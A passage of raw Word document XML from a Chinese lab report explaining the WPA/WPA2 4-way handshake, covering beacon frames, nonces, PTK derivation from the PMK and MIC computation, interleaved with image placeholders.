          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">4 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>次握手原理</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A36D26C" w14:textId="67657D36" w:rsidR="005A1724" w:rsidRDefault="00023642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四</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>、实验</w:t>
      </w:r>
      <w:r w:rsidR="00DB6C49" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>原理</w:t>
      </w:r>
      <w:r w:rsidR="005A1724" w:rsidRPr="00F15578">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00BA151A">
        <w:rPr>
          <w:rFonts w:ascii="仿宋" w:eastAsia="仿宋" w:hAnsi="仿宋"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5469EA79" w14:textId="559E3356" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">4-way </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手之前</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">STA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>应该收到</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>广播的</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">beacon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帧。</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">AP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过广播</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">beacon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>帧来表示其无线网络的存在。如下图所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3129AD94" w14:textId="36390EC5" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0E4729FD" wp14:editId="5B228A7A">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1150619</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>152249</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5287004" cy="3076575"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="237" name="image37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image379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7004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eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">通过 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">beacon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">帧，我们能够找到 </w:t>
      </w:r>
      <w:r>
        <w:t>SSID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，如下图：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58F4F10C" wp14:editId="47D03D3D">
            <wp:extent cx="5295337" cy="2233803"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="239" name="image38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image380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5337" cy="223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832E9" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:spacing w:before="75"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">接下来是 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4-way </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手过程，大致流程为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C5D47C" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:spacing w:before="12"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1ACA2BDF" wp14:editId="5901D444">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1670304</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>162765</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4237723" cy="4829175"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="241" name="image38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image38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37723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61B8A1" w14:textId="14E424A4" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>MSG-1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4-way </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>握手的第一条消息如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C3BE89" w14:textId="60DA7AAC" w:rsidR="00DC39A7" w:rsidRDefault="005D70F8" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsiaTheme="minorEastAsia"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:noProof/>
          <w:sz w:val="20"/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EB769FC" wp14:editId="34505BA5">
            <wp:extent cx="5274310" cy="2861950"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="243" name="image38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image38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FD4D9" w14:textId="77777777" w:rsidR="005D70F8" w:rsidRDefault="005D70F8" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="480"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>作为产生 PTK 的输入之一。STA 接收到第一个握手包后，就获得了 ANonce。STA 也生成一个 Nonce，称为SNonce。通过设置无线网络时的配置，STA 和 AP 已经知道共同的 PMK，因此具备了生成 PTK 的所需输入。则 STA 生成 PTK。生成 PTK 后，STA 发送第二个握手包给 AP， 其中包含两个重要的信息。其一是 STA 生成的 256 比特SNonce；其二是 128 比特MIC。 AP 需要 SNonce 来生成 PTK。ANonce 和 SNonce 用于防止重放攻击。SNonce 如下图：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="449158B6" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体"/>
          <w:sz w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2166B64C" wp14:editId="7C6C3BC0">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1150619</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>124154</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5242849" cy="2991802"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="245" name="image38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image383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2849" cy="29918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E0D213" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRPr="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC39A7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MIC 用于验证 STA 知道 PTK，进而需要知道 PMK，从而验证了 STA 是合法的。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EDAB5CF" w14:textId="0F5CAA6C" w:rsidR="00352092" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DC39A7">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>MIC 字段如下图所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7102ACCD" w14:textId="1A4DAB2B" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/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665408" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30AC5542" wp14:editId="5E4F8723">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>200025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5283595" cy="3120390"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="247" name="image38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image38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3595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86E20F" w14:textId="72C5066D" w:rsidR="00DC39A7" w:rsidRPr="005D70F8" w:rsidRDefault="00DC39A7" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">MIC </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的计算方法为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="777FDA3E" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRPr="005D70F8" w:rsidRDefault="00DC39A7" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:right="967"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输入：</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">802.1x </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的所有字段，包括 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">MIC </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">字段，只是在计算的时候该字段设置为全 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5864FE5D" w14:textId="65A14924" w:rsidR="00DC39A7" w:rsidRPr="005D70F8" w:rsidRDefault="00DC39A7" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:right="967"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来说，计算函数是 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>HMAC-MD5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357F09A2" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRPr="005D70F8" w:rsidRDefault="00DC39A7" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">WPA2 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">来说，计算函数是 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t>HMAC-SHA1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1622CE" w14:textId="77777777" w:rsidR="00DC39A7" w:rsidRPr="005D70F8" w:rsidRDefault="00DC39A7" w:rsidP="005D70F8">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">下图显示了 </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
        <w:t xml:space="preserve">802.1x </w:t>
      </w:r>
      <w:r w:rsidRPr="005D70F8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的所有字段值。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B947BB6" w14:textId="7D07186C" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US" w:bidi="ar-SA"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1440E724" wp14:editId="18F005F4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>1143000</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>189865</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5238434" cy="2886360"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="249" name="image38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image385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8434" cy="2886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FF9582" w14:textId="40B37784" w:rsidR="00DC39A7" w:rsidRDefault="00DC39A7" w:rsidP="00DC39A7">
      <w:pPr>
        <w:pStyle w:val="ae"/>
        <w:ind w:firstLineChars="200" w:firstLine="456"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">要通过验证，也就是 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve">STA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-29"/>
        </w:rPr>
        <w:t xml:space="preserve">和 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-10"/>
        </w:rPr>
        <w:t xml:space="preserve">计算出来的 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">MIC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>相同，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
        </w:rPr>
        <w:t xml:space="preserve">STA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-9"/>
        </w:rPr>
        <w:t xml:space="preserve">必须有正确的 </w:t>
      </w:r>
      <w:r>
        <w:t>PTK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve">进而正确的 </w:t>
      </w:r>
      <w:r>
        <w:t>PMK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">，因为计算的 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PTK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-6"/>
        </w:rPr>
        <w:t xml:space="preserve">的输入之一为 </w:t>
      </w:r>
      <w:r>
        <w:t>PMK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-3"/>
        </w:rPr>
        <w:t xml:space="preserve">。如果通过验证，则证明 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-14"/>
        </w:rPr>
        <w:t xml:space="preserve">STA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-8"/>
        </w:rPr>
        <w:t xml:space="preserve">具有合法的 </w:t>
      </w:r>
      <w:r>
        <w:t>PMK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-12"/>
        </w:rPr>
        <w:t xml:space="preserve">，但是 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PMK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve">没有在网上上传输，确保了 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PTK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的保密性。第三方即使</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-15"/>
        </w:rPr>
        <w:t xml:space="preserve">观察到了这些流量，也无法推断出 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">PTK </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-22"/>
        </w:rPr>
        <w:t xml:space="preserve">或者 </w:t>
      </w:r>
      <w:r>
        <w:t>PMK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-22"/>
        </w:rPr>
        <w:t xml:space="preserve">。上述过程完成了 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">AP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="55"/>
        </w:rPr>
        <w:t>对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-7"/>
        </w:rPr>
        <w:t xml:space="preserve">STA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
